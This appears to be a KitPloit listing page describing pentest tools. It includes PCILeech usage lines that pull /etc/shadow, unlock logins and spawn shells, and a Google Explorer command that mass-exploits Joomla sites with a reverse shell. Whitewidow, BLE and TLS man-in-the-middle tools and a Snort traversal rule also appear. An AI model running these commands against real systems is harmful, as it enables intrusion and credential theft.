Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

PCILeech - Direct Memory Access (DMA) Attack Software

$
0
0

The PCILeech use the USB3380 chip in order to read from and write to the memory of a target system. This is achieved by using DMA over PCI Express. No drivers are needed on the target system. The USB3380 is only able to read 4GB of memory natively, but is able to read all memory if a kernel module (KMD) is first inserted into the target system kernel. Reading 8GB of memory from the target system take around one (1) minute. The PCILeech hardware is connected with USB3 to a controlling computer running the PCILeech program. PCILeech is also capable of inserting a wide range of kernel modules into the targeted kernels - allowing for pulling and pushing files, remove the logon password requirement, loading unsigned drivers, executing code and spawn system shells. The software is written in visual studio and runs on Windows 7/Windows 10. Supported target systems are currently the x64 versions of: Linux, FreeBSD, macOS and Windows.

Hardware:
PCILeech is dependant on the PLX Technologies USB3380 chip. The actual chip can be purchased for around $15, but it's more convenient to purchase a development board on which the chip is already mounted. Development boards can be purchased from BPlus Technology, or on eBay / Ali Express. Please note that adapters may be required too depending on your requirements.
The hardware confirmed working is:
  • USB3380-EVB mini-PCIe card.
  • PP3380-AB PCIe card.
Please note that the ExpressCard EC3380-AB is not working!
Recommended adapters:
  • PE3B - ExpressCard to mini-PCIe.
  • PE3A - ExpressCard to PCIe.
  • ADP - PCIe to mini-PCIe.
  • Sonnet Echo ExpressCard Pro - Thunderbolt to ExpressCard.
Please note that other adapters may also work.

Flashing Hardware:
In order to turn the USB3380 development board into a PCILeech device it needs to be flashed. Flashing must be done in Linux as root. Download the source code for the flash kernel module to build. The files are found in the pcileech_flash folder and are named: pcileech_flash.c and Makefile. The card must be connected to the Linux system doing the flashing via PCIe.
NB! If flashing the PP3380 PCIe card the J3 jumper must be bridged to connect the EEPROM. This is not necessary for the USB3380-EVB mini-PCIe card.
  • cd /pathtofiles
  • make
  • [ insert USB3380 hardware into computer ]
  • insmod pcileech_flash.ko
The insmod command must be run as root. If compilation fails you might have to install dependencies before you try again. On debian based systems - such as debian, ubuntu and kali, run apt-get update && apt-get install gcc make linux-headers-$(uname -r) and try again.
If module insertion is successful flashing is also successful. In order to activate the flashed PCILeech device it must be power-cycled. Re-inserting it in the computer will achieve this. If one wish to flash more devices then unload the pcileech_flash kernel module by issuing the command: rmmod pcileech_flash . If there is an error flashing is unsuccessful. Please try again and check any debug error messages by issing the command: dmsg .

Installing PCILeech:
Please ensure you do have the most recent version of PCILeech by visiting the PCILeech github repository at: https://github.com/ufrisk/pcileech
Clone the PCILeech Github repository. The binaries are found in pcileech_files and should work on Windows 7 and Windows 10 64-bit versions. Please copy all files from pcileech_files since some files contains additional modules and signatures.
The Google Android USB driver also needs to be installed. Download the Google Android USB driver from: http://developer.android.com/sdk/win-usb.html#download Unzip the driver. Open Device Manager. Right click on the computer, choose add legacy hardware. Select install the hardware manually. Click Have Disk. Navigate to the Android Driver, select android_winusb.inf and install. The PCILeech lies about being a Google Glass so that the Android USB driver may be used to access the PCILeech hardware from Windows.

Generating Signatures:
PCILeech comes with built in signatures for Linux, FreeBSD and macOS. For Windows 8.1 and higher two full pages of driver code is needed to hijack the kernel. In order to avoid copyright issues the end user has to generate these signatures by themselves using the pcileech_gensig.exe program. The user needs to point to a valid ntfs.sys file in order to generate a signature. Alternatively it is possible to use the unstable/experimental win10_x64 generic built-in signature.

Capabilities:
Users should be able to extend PCILeech easily by writing own kernel shellcode modules and/or creating custom signatures used to patch target system memory. Some of the current capabilies are listed below:
  • Retrieve memory from the target system at >150MB/s.
  • Write data to the target system memory.
  • 4GB memory can be accessed in native DMA mode.
  • ALL memory can be accessed if kernel module (KMD) is loaded.
  • Execute kernel code on the target system.
  • Spawn system shell [Windows].
  • Spawn any executable [Windows].
  • Load unsigned drivers [Windows].
  • Pull files [Linux, FreeBSD, Windows, macOS].
  • Push files [Linux, Windows, macOS].
  • Patch / Unlock (remove password requirement) [Windows, macOS].

Limitations/Known Issues:
  • Read and write errors on some older hardware. Try "pcileech.exe testmemreadwrite -min 0x1000" in order to test memory reads and writes against the physical address 0x1000 (or any other address) in order to confirm.
  • Does not work if the OS uses the IOMMU/VT-d. This is the default on macOS (unless disabled in recovery mode). Windows 10 Enterprise with Virtuallization based security features enabled does not work fully - this is however not the default setting in Windows 10.
  • Some Linux kernels does not work. Sometimes a required symbol is not exported in the kernel and PCILeech fails.
  • Linux might also not work if some virtualization based features are enabled.
  • Linux based on the 4.8 kernel does not work (Ubuntu 16.10).
  • Windows Vista: some shellcode modules such as wx64_pscmd does not work.
  • Windows 7: signatures are not published.

Examples:
Load macOS kernel module:
         pcileech.exe kmdload -kmd macos    
    Remove macOS password requirement, requires that the KMD is loaded at an address. In this example 0x11abc000 is used.
           pcileech.exe macos_unlock -kmd 0x11abc000 -0 1    
      Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
             pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow    
        Show help for the lx64_filepull kernel implant.
               pcileech.exe lx64_filepull -help    
          Load a kernel module into Windows Vista by using the default memory scan technique.
                 pcileech.exe kmdload -kmd winvistax64    
            Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
                   pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt    
              Load a kernel module into Windows 10 (unstable/experimental). Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
                     pcileech.exe kmdload -kmd WIN10_X64    
                Spawn a system shell on the target system (system needs to be locked and kernel module must be loaded). In this example the kernel module is loaded at address: 0x7fffe000.
                       pcileech.exe wx64_pscmd -kmd 0x7fffe000    
                  Show help for the dump command.
                         pcileech.exe dump -help    
                    Dump all memory from the target system given that a kernel module is loaded at address: 0x7fffe000.
                           pcileech.exe dump -kmd 0x7fffe000    

                      Building:
                      The binaries are found in the pcileech_files folder. If one wish to build an own version it is possible to do so. Compile the pcileech and pcileech_gensig projects from within Visual Studio. Tested with Visual Studio 2015. To compile kernel- and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled command line.

                      Changelog:
                      v1.0
                      • Initial release.
                      v1.1
                      • core: help for actions and kernel implants.
                      • core: search for signatures (do not patch).
                      • core: signature support for wildcard and relative offsets in addition to fixed offsets.
                      • implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
                      • signature: generic Windows 10 (Unstable/Experimental) [win10_x64].
                      • signature: Windows 10 updated.
                      • signature: Linux unlock added.
                      • other: firmware flash support without PLX SDK.
                      • other: various bug fixes.
                      v1.2
                      • core: FreeBSD support.
                      • implant: pull file from FreeBSD [fbsdx64_filepull]
                      • signature: Windows 10 updated.
                      • signature: macOS Sierra added.
                      • other: various bug fixes and stability improvements.
                      latest
                      • new implant: spawn cmd in user context [wx64_pscmd_user]
                      • implant: stability improvements for Win8+ [wx64_pscreate, wx64_pscmd, wx64_pscmd_user]



                      datasploit - A tool to perform various OSINT techniques

                      $
                      0
                      0
                      A tool to perform various OSINT techniques, aggregate all the raw data, visualise it on a dashboard, and facilitate alerting and monitoring on the data.

                      Overview of the tool:
                      • Performs OSINT on a domain / email / username / phone and find out information from different sources.
                      • Correlates and collaborate the results, show them in a consolidated manner.
                      • Tries to find out credentials, api-keys, tokens, subdomains, domain history, legacy portals, etc. related to the target.
                      • Use specific script / launch automated OSINT for consolidated data.
                      • Available in both GUI and Console.

                      Basic Usage:

                      ____/ /____ _ / /_ ____ _ _____ ____ / /____ (_)/ /_
                      / __ // __ `// __// __ `// ___// __ \ / // __ \ / // __/
                      / /_/ // /_/ // /_ / /_/ /(__ )/ /_/ // // /_/ // // /_
                      \__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                      /_/

                      Open Source Assistant for #OSINT
                      website: www.datasploit.info

                      Usage: domainOsint.py [options]

                      Options:
                      -h, --help show this help message and exit
                      -d DOMAIN, --domain=DOMAIN Domain name against which automated Osint
                      is to be performed.

                      Required Setup:
                      • Bunch of python libraries (use requirements.txt)
                      • MongoDb, Django, Celery and RabbitMq (Refer to setup guide).

                      Detailed Tool Documentation:
                      http://datasploit.readthedocs.io/en/latest/


                      BinProxy - BinProxy is a proxy for arbitrary TCP connections

                      $
                      0
                      0

                      BinProxy is a proxy for arbitrary TCP connections. You can define custom message formats using the BinData gem.

                      Installation

                      Prerequisites
                      • Ruby 2.3 or later
                      • A C compiler, Ruby headers, etc., are needed to compile several dependencies.
                        • On Ubuntu, sudo apt install build-essential ruby-dev should do it.
                        • If you've installed a custom Ruby (e.g. with RVM), you probably already have what you need.
                      • openssl binary for --tls without an explicit cert/key.
                      • To build the UI, node.js and npm. (Not needed at runtime)

                      From Rubygems
                      gem install binproxy
                      You may need to use sudo , depending on your Ruby installation.

                      From Source
                      git clone https://github.com/nccgroup/BinProxy.git binproxy
                      cd binproxy

                      # Install ruby dependencies.
                      # Depending on your setup, one or both of these may require sudo.
                      gem install bundler && bundle

                      # The UI is built with a webpack/babel toolchain:
                      (cd ui && npm install) \
                      && rake build-ui

                      # Confirm that everything works
                      # run.sh sets up the environment and passes all args to binproxy
                      ./run.sh --help
                      To build and install the gem package:
                      gem build binproxy.gemspec

                      # Again, you may need sudo here
                      gem install binproxy-1.0.0.gem
                      Bug reports on installation issues are welcome!

                      Usage

                      Basic Usage
                      1. Run binproxy with no arguments.
                      2. Browse to http://localhost:4567/
                      3. Enter local and remote hostnames or IP addresses and ports, and click 'update'
                      4. Point a client at the local service, and watch the packets flow.

                      Command Line Flags
                      See --help for the complete list, but in short:
                      binproxy -c <class> [<local-host>] <local-port> <remote-host> <remote-port>
                      If you leave out the -c argument, a simple hex dump is shown.
                      If you leave out the local host, binproxy assumes localhost.
                      With the --socks-proxy or --http-proxy options, the remote host and port are determined dynamically, and should not be specified.

                      Examples
                      # Proxy from localhost:9000 -> example.com:9000
                      binproxy localhost 9000 example.com 9000

                      # Act as a SOCKS proxy on localhost:1080
                      # MITM and unwrap TLS on the proxied traffic, using a self-signed cert and key
                      binproxy -S --tls 1080

                      # "Poor substitute for Burp" mode:
                      #
                      # HTTP proxy; MITM TLS w/ pre-generated cert; simple header parsing
                      # Note: this will only work on HTTPS traffic, not plain HTTP!
                      # If you're working with the source repo, you generate the certs with:
                      # rake makecert[example.com]
                      # And then import certs/ca-cert.pem into your browser or OS's trust store.
                      binproxy -H --tls \
                      --tls-cert certs/example.com-cert.pem \
                      --tls-key certs/example.com-key.pem \
                      --class-name DumbHttp::Message \
                      localhost 8080

                      Customizing
                      By default, the proxy uses the built-in RawMessage class, which just gives you a hexdump of each message (assuming 1:1 between messages and TCP packets)
                      You can view parsed protocol information by specifying a BinData::Record subclass† with the --class command line argument.
                      You may also wish to define the following in your class:
                      def summary
                      # return a single-line description of this record
                      end

                      # currently supported options are
                      # - nil : use default display
                      # - "anon" : for structs, show contents directly
                      # - "hex" : for numbers, display as 0x1234ABCD
                      # - "hexdump" : for strings, display like `hexdump -C`
                      default_parameter display_as: "..."

                      # TODO: document state stuff
                      def self.initial_state
                      end

                      def current_state
                      end

                      def update_state
                      end
                      † Technically, any subclass of BinData::Base will work.

                      Dynamic Proxying
                      By default, BinProxy relays all traffic to a static upstream host and port. It can also be configured to act as a SOCKS (v4 or v4a) or HTTP proxy with the --socks-proxy and --http-proxy flags, respectively.
                      Note: Currently, the HTTP proxy only supports connections tunneled with the HTTP CONNNECT verb; it cannot proxy raw HTTP GET , POST , etc., requests. In practice, this means that HTTPS traffic will work, but plain HTTP traffic will not unless the client supports a flag to force tunneling, like curl -p .

                      TLS / SSL
                      Use the --tls flag to unwrap TLS encryption before processing messages. By default, BinProxy will generate a self-signed certificate. You can sepecify PEM files containing a certificate and key with --tls-cert and --tls-key . (If you've cloned the source repo, use rake makecert[example.com] to generate a static CA and a certificate with the appropriate hostname.)


                      BORG - Terminal Based Search For Bash Snippets

                      $
                      0
                      0

                      Borg was built out of the frustration of having to leave the terminal to search and click around for bash snippets. Borg's succint output also makes it easy to glance over multiple snippets quickly.

                      Search
                      borg "find all txt"
                      (1) Find and delete .txt files in bash
                      [a] find . -name "*.txt" | xargs rm
                      [b] find . -name "*.txt" -exec rm {} \;
                      [c] $ find . -name "*.txt" -type f -delete

                      (2) bash loop through all find recursively in sub-directories
                      [a] FILES=$(find public_html -type f -name '*.php')
                      [b] FILES=`find public_html -type d`
                      Can't find what you are looking for? Be a good hacker and contribute your wisdom to the hive mind - add your own snippets or tweak the existing ones.

                      Install
                      The following releases only let you search, to use add/edit install from source, releases are coming soon.
                      brew install borg
                      For linux, download a release manually releases
                      wget https://github.com/ok-borg/borg/releases/download/v0.0.1/borg_linux_amd64 -O /usr/local/bin/borg
                      chmod 755 /usr/local/bin/borg
                      Or download a release manually for Mac:
                      wget https://github.com/ok-borg/borg/releases/download/v0.0.1/borg_darwin_amd64 -O /usr/local/bin/borg
                      chmod 755 /usr/local/bin/borg

                      Rate results: worked
                      When you see a result that worked for you, you can use the worked command to give feedback:
                      borg worked 12
                      Once you do this the result will rank higher for similar queries - it is especially useful if you find a good result that you think are too down in the result list.

                      Advanced usage
                      For more commands and their explanations, please see advanced usage

                      How does borg work?
                      The client connects to a server at ok-b.org, but you can host your own if you want to (see daemon folder).
                      Self hosting will become less appealing once people start contributing their own content to the database though.

                      Explanation for ui
                      • () denotes hits for your query
                      • [] denotes snippets found for a given query
                      • ... under a [] means more lines to display (use the -f flag for full display, see more about usage below)


                      Google Explorer - Google Mass Explorer

                      $
                      0
                      0

                      [+] Google Mass Explorer

                      This is a automated robot for google search engine.
                      Make a google search, and parse the results for a especific exploit you define. The options can be listed with --help parameter.

                      Intro:
                      This project is a main project that i will keep upgrading when new exploits are published. They idea is use google search engine to find vulnerable targets, for specific exploits. The exploits parsers will be concentrated in google_parsers module. So when you make a search, you can choose explicit in "--exploit parser" argument, a especific exploit to the robot test if is the targets are vulnerable for that or not.
                      ** !!! Is very important you use the right dork for the specific exploit.
                      The google parsers module (google_parsers.py) is the file that i will keep upgrading. For this version i'm putting just the joomla cve exploit. I have a wordpress bot too, but the ideia is you make your own parsers =))) If you have difficul to make, just send me the exploit and we make together =))
                      I make this google explorer because i'm very busy, and take to much time to search for targets in google manually. So I use a automated framework (Selenium) to make a robot to search for targets for me ;)) The problem using other libs and modules, is the captcha from google, and using Selenium, you can type the captcha when it is displayed, and the robots keeps crawling with no problem =)) This was the only way i find out to "bypass" this kind of protection... After it work, i decide to publish to everyone.

                      How the robot works:
                      1 - Make a google search
                      2 - Parse the from each page results
                      3 - Test if each target is vulnerable for a specific exploit.

                      Requiriments:
                      !!!!!! PYTHON 3 !!!!!!
                      The requirements is in requirements.txt file, you should install what is listed on it with:
                      $ sudo pip install -r requirements.txt
                      These are some exemples that you can use, and make your own:
                      python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
                      On this exemple, im looking for servers in France, vulnerables to joomla RCE, using google.com domain as google search (they are listed in google_doomais.txt file), with last update on last month.
                      All these options are possible to any language, it will depends only in what google use for syntax for your country..
                      I have some old videos on my channel on youtube showing how it works, so take a look at the description of the olders projects in github if you need some video exemples ;))

                      Usage:
                      google_explorer.py --dork=<arg> --browser=<arg> [--exploit_parser=<arg>] [--language=<arg>]
                      [--location=<arg>] [--last_update=<arg>]
                      [--revshell=<arg>] [--port=<arg>]
                      [--google_domain=<arg>]

                      google_explorer.py --help
                      google_explorer.py --version
                      Options:
                      -h --help                                Open help menu
                      -v --version Show version
                      Required options:
                      --dork='google dork'                     your favorite g00gle dork :)
                      --browser='browser' chrome
                      chromium
                      Optional options:
                      --language='page language'               Portuguese
                      English
                      Arabic
                      Romanian
                      ...
                      ...

                      --location='server location' Brazil
                      Mauritania
                      Tunisia
                      Marroco
                      Japan
                      ...
                      ...

                      --last_update='page last update' anytime
                      past 24 hours
                      past week
                      past month
                      past year

                      --exploit_parser='Name or CVE exploit' joomla_15_12_2015_rce
                      generic_parser

                      --revshell='IP' public ip for reverse shell
                      --port='PORT' port for back connect

                      --google_domain='google domain' google domain to use on search. Ex: google.co.uk


                      Lynis 2.4.0 - Security Auditing Tool for Unix/Linux Systems

                      $
                      0
                      0

                      We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

                      Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

                      Supported operating systems

                      The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
                      • AIX
                      • FreeBSD
                      • HP-UX
                      • Linux
                      • Mac OS
                      • NetBSD
                      • OpenBSD
                      • Solaris
                      • and others
                      It even runs on systems like the Raspberry Pi and several storage devices!

                      Installation optional

                      Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

                      How it works

                      Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

                      Steps
                      1. Determine operating system
                      2. Search for available tools and utilities
                      3. Check for Lynis update
                      4. Run tests from enabled plugins
                      5. Run security tests per category
                      6. Report status of security scan
                      Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

                      Opportunistic scanning

                      Lynis scanning is opportunistic: it uses what it can find.
                      For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

                      In-depth security scans

                      By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

                      Use cases

                      Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
                      • Security auditing
                      • Compliance testing (e.g. PCI, HIPAA, SOx)
                      • Vulnerability detection and scanning
                      • System hardening

                      Resources used for testing

                      Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
                      • Best practices
                      • CIS
                      • NIST
                      • NSA
                      • OpenSCAP data
                      • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

                      Lynis Plugins

                      lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


                      Changelog
                      Upgrade note
                      Lynis 2.4.0 (2016-10-27)

                      Exactly one month after previous release, the Lynis project is proud to announce
                      a new release. This release had the specific focus to improve support for macOS
                      users. Thanks to testers and contributors to make this possible.

                      New:
                      ----
                      * New group "system integrity" added
                      * Support for clamconf utility
                      * Chinese translation (language=cn)
                      * New command "upload-only" to upload just the data instead of a full audit
                      * Enhanced support for macOS, including HostID2 generation for macOS
                      * Support for CoreOS
                      * Detection for pkg binary (FreeBSD)
                      * New command: lynis show hostids (show host ID)
                      * New command: lynis show environment (hardware, VM, or container type)
                      * New command: lynis show os (show operating system details)

                      Changes:
                      --------
                      * Several new sysctl values have been added to the default profile
                      * Existing tests have been enhanced to support macOS

                      Tests:
                      ------
                      * AUTH-9234 - Support for macOS user gathering
                      * BOOT-5139 - Support for machine roles in LILO test
                      * BOOT-5202 - Improve uptime detection for macOS and others
                      * FIRE-4518 - Improve pf detection and mark as root-only test
                      * FIRE-4530 - Don't show error on screen for missing IPFW sysctl key
                      * FIRE-4534 - Check Little Snitch on macOS
                      * INSE-8050 - Test for insecure services on macOS
                      * MACF-6208 - Allow non-privileged execution and filter permission issues
                      * MALW-3280 - Detection for Avast and Bitdefender daemon on macOS
                      * NETW-3004 - Support for macOS
                      * PKGS-7381 - Improve test for pkg audit on FreeBSD
                      * TIME-3104 - Chrony support extended

                      Plugins (community and commercial):
                      -----------------------------------
                      * PLGN-1430 - Gather installed software packages for macOS
                      * PLGN-4602 - Support for Clam definition check on macOS


                      GATTacker - BLE (Bluetooth Low Energy) Man-in-the-Middle

                      $
                      0
                      0


                      A Node.js package for BLE (Bluetooth Low Energy) security assessment using Man-in-the-Middle and other attacks.

                      Prerequisites
                      see:
                      https://github.com/sandeepmistry/noble
                      https://github.com/sandeepmistry/bleno

                      Install
                      npm install gattacker

                      Usage

                      Configure
                      Running both components Set up variables in config.env:
                      • NOBLE_HCI_DEVICE_ID : noble ("central", ws-slave) device
                      • BLENO_HCI_DEVICE_ID : bleno ("peripheral", advertise) device
                      If you run "central" and "peripheral" modules on separate boxes with just one BT4 interface, you can leave the values commented.
                      • WS_SLAVE : IP address of ws-slave box
                      • DEVICES_PATH : path to store json files

                      Start "central" device
                      sudo node ws-slave
                      Connects to targeted peripheral and acts as websocket server.
                      Debug:
                      DEBUG=ws-slave sudo node ws-slave

                      Scanning

                      Scan for advertisements
                      node scan
                      Without parameters scans for broadcasted advertisements, and records them as json files (.adv.json) in DEVICES_PATH

                      Explore services and characteristics
                      node scan <peripheral>
                      Explore services and characteristics of chosen peripheral. Saves the explored service structure in json file (.srv.json) in DEVICES_PATH.

                      Hook configuration (option)
                      For active request/response tampering configure hook functions for characteristic in device's json services file.
                      Example:
                                  {
                      "uuid": "06d1e5e779ad4a718faa373789f7d93c",
                      "name": null,
                      "properties": [
                      "write",
                      "notify"
                      ],
                      "startHandle": 8,
                      "valueHandle": 9,
                      "endHandle": 10,
                      "descriptors": [
                      {
                      "handle": 10,
                      "uuid": "2902",
                      "value": ""
                      }
                      ],
                      "hooks": {
                      "dynamicWrite": "dynamicWriteFunction",
                      "dynamicNotify": "customLog"
                      }
                      }
                      Functions:
                      dynamic: connect to original device
                      static: do not connect to original device, run the tampering function locally
                      It will try to invoke the specified function from hookFunctions, include your own. A few examples provided in hookFunctions subdir.
                      staticValue - static value

                      Start "peripheral" device
                      node advertise -a <advertisement_json_file> [ -s <services_json_file> ]
                      It connects via websocket to ws-slave in order to forward requests to original device. Static run (-s) sets services locally, does not connect to ws-slave. You have to configure the hooks properly.

                      MAC address cloning
                      For many applications it is necessary to clone MAC address of original device. A helper tool bdaddr from Bluez is provided in helpers/bdaddr.
                      cd helpers/bdaddr
                      make
                      wrapper script:
                      ./mac_adv -a <advertisement_json_file> [ -s <services_json_file> ]

                      Troubleshooting
                      Turn off, cross fingers, try again ;)

                      reset device
                      hciconfig <hci_interface> reset

                      Running ws-slave and advertise on the same box
                      With this configuration you may experience various problems.
                      Try switching NOBLE_HCI_INTERFACE and BLENO_HCI_INTERFACE

                      hcidump debug
                      hcidump -x -t <hci_interface>

                      FAQ, more information
                      FAQ: https://github.com/securing/gattacker/wiki/FAQ
                      More information: www.gattack.io


                      Whitewidow 1.5.0 - SQL Vulnerability Scanner

                      $
                      0
                      0

                      Whitewidow is an open source automated SQL vulnerability scanner, that is capable of running through a file list, or can scrape Google for potential vulnerable websites. It allows automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntax, and a fun environment. This program was created for learning purposes, and is intended to teach users what vulnerability looks like.
                      Although whitewidow is a completely open source project, and is completely free. Every once in awhile I need a beer. If you like this program, and like this idea, you can help me with my beer fund.

                      Screenshots


                      Usage
                      ruby whitewidow.rb -h
                      Will print the help page
                      ruby whitewidow.rb -c
                      Will displlay the credits, can also be run in conjunction with -f or -d
                      ruby whitewidow.rb -l
                      Will display the legal info, can also be run in conjunction with -f or -d
                      ruby whitewidow.rb -d
                      Will run whitewidow in default mode and scrape Google using the search queries in the lib directory
                      ruby whitewidow.rb -d --banner
                      Will scrape Google and hide the banner
                      ruby whitewidow.rb -d --proxy 127.0.0.1:80
                      Proxy configuration, must use the ":"
                      ruby whitewidow.rb -d --dry-run
                      Will do a dry run of the program, meaning it won't scan for vulnerabilities, will prompt if you want to run a scan or not
                      ruby whitewidow.rb -d --dry-run --batch
                      Will do a dry run and not prompt you for anything, won't run a scan
                      ruby whitewidow.rb -f <path/to/file>
                      Will run Whitewidow through a file, you will not need to provide whitewidow the full path to the file, just provide it the paths within the whitewidow directory itself. Also you will not need a beginning slash.

                      Example:
                      - whitewidow.rb -f tmp/sites.txt #<= CORRECT
                      - whitewidow.rb -f /home/users/me/whitewidow-1.0.6/tmp/sites.txt #<= INCORRECT
                      ruby whitewidow.rb --run-x 10
                      Will run 10 dry runs in batch mode and display no other information (legal, banner, etc..)
                      ruby whitewidow.rb -s URL
                      Will spider the URL and extract all the links from there, saving them to a file. Will then run the file through whitewidows file flag

                      Dependencies
                      gem 'mechanize'  
                      gem 'nokogiri'
                      gem 'rest-client'

                      To install all gem dependencies, follow the following template:
                      cd whitewidow
                      bundle install

                      This should install all gems needed, and will allow you to run the program without trouble.



                      Sniffles - Packet Capture Generator for IDS and Regular Expression Evaluation

                      $
                      0
                      0

                      Sniffles is a tool for creating packet captures that will test IDS that use fixed patterns or regular expressions for detecting suspicious behavior. Sniffles works very simply. It takes a set of regular expressions or rules and randomly chooses one regular expression or rule. It then generates content based on that rule or regular expression. For fixed strings, this means adding the string directly to the data (possibly with offsets or other options as per Snort rules). For regular expressions the process is somewhat more complex. The regular expression is converted to an NFA and a random path is chosen through the NFA (from start to end). The resulting data will match to the regular expression. Finally, Sniffles can be set to full match or partial match. With a full match, the packet data will absolutely match to at least one rule or regular expression (Some Snort options are not fully considered though). A partial match will erase the last character from a matching character sequence to a sequence that should not match (may match to another rule though). Matching rules should cause the most burden on an IDS. Thus, it is possible to determine how well the IDS handles worst case traffic. Partial matching traffic will cause almost as much burden as matching traffic. Finally, Sniffles can also generate traffic that has completely random data. Such random data offers a best case scenario as random data is very unlikely to match with any rules. Thus, it can be processed at maximum speed. Thus, Sniffles allows the creation of packet captures for best and worst case operation of IDS deep packet inspection.
                      In additon to above, Sniffles also has the ability to create evaluation packet captures. There are two types of evaluation packet captures. The first evaluation packet capture will create exactly one packet for each rule or regular expression, in sequence. Thus it is possible to test and see that each rule matches as expected. The full evaluation goes a step further and creates a packet for exvery possible branch in a regular expression. A single regular expression could have thousands of possible branches. This tests to ensure that all possible branches of a regular expression are handled properly. Evaluation packet captures should match all packets. Any unmatched packets most likely represent a failure of the IDS and need further investigation. Of course, there is always the possiblity that Sniffles is not creating the correct packet for a given IDS, or doesn't recognize a particular option for a rule. Check the supported rule features for more information.
                      Finally, Sniffles can also do a lot for generating random network traffic. By default, random traffic is TCP, UDP, or ICMP and unidirectional. However, it can also generate TCP traffic with ACKs, handshakes, and teardowns for each stream. It will generate correct sequence numbers and checksums. Further, MAC addresses can be set according to desired distributions, and IP network addresses can be defined by Home and External address spaces. In addition, it is possible to simulate scans within a traffic capture.

                      Install
                      REQUIRES: Python 3.3+ and the SortedContainers module
                      Sniffles consists of the following files:
                      • rulereader.py: The parser for rules.
                      • ruletrafficgenerator.py: The tool for generating content streams.
                      • sniffles.py: The main program managing the process.
                      • sniffles_config.py: handles command line input and options for Sniffles.
                      • traffic_writer.py: Writes a packet into a pcap compatible file. Does not require libpcap.
                      • vendor_mac_list.py: Contains MAC Organisationally Unique Identifiers used for generating semi-realistic MAC addresses rather than just randomly mashed together octets.
                      • examples/vendor_mac_definition.txt: Optional file for defining the distribution of partial or full MAC addresses.
                      • pcre files for pcre (pcre_chartables.c pcre_compile.c pcre_globals.c pcre_internal.h pcre_newline.c pcre_tables.c pcre.h pcrecomp.c pcreconf.py ucp.h).
                      • nfa.py: for traversing NFA.
                      • regex_generator.py: The code for generating random regular expressions.
                      • rand_rule_gen.py, feature.py, and rule_formats.py: modules for generating random rule sets.
                      To install:
                      1. Go to the Top-level directory.
                      2. Type python3.x setup.py install .
                      3. This will install the application to your system.
                      Install Notes:
                      1. This has not been tested with Windows nor has it been tested on Linux. It has been tested on FreeBSD and Mac OS X.
                      2. Use python3.x setup.py build to build locally, then go to the library directory, find the lib and use python3.4 -c "from sniffles import sniffles; sniffles.main()" to run locally.

                      Supported Formats:
                      • Snort: Snort alert rules (rule should begin with the Alert directive). Content tags are recognized and parsed correctly. PCRE tags are likewise correctly parsed. HTTP tags are processed consecutively so they may not create the desired packet. Content (and PCRE or HTTP content) can be modified by distance, within and offset. A rule may use a flow control option, though only the direction of the data is derived from this. The nocase option is ignored and the case presented is used. All other options are ignored. The header values are parsed and a packet will be generated meeting those values. If Home and External network address spaces are used then the correct space will be used for the respective $HOME_NET and $EXTERNAL_NET variables. Example:
                        alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SERVER-APACHE Apache Tomcat UNIX platform directory traversal"; flow:to_server; content:"/..|5C|/"; content:"/..|5C|/"; http_raw_uri;
                      • Regular expressions: Raw regular expressions 1 to a line written as either abc or /abc/i. Currently supports the options i, s, and m. Other options are ignored. Example:
                        /ab*c(d|e)f/i
                      • Sniffles Rule Format described below.

                      Command Line Options:
                      • -a TCP Ack: Send a TCP acknowledgment for every data packet sent. Off by default. Acknowledgement packets have no data by default.
                      • -b Bidirectional data: Data will be generated in both directions of a TCP stream. ACKs will be turned on. This feature is off by default.
                      • -c Count: Number of streams to create. Each stream will contain a minimum of 1 packet. Packet will be between two end-points as defined by the rule or randomly chosen. tcp_handshake, tcp_teardown, and packets_per_stream will increase the number of packets per stream. Currently, data in a stream flows in only one direction. If the -b option is used data should flow in both directions. Also, Sniffles rules can designate data to flow in both directions.
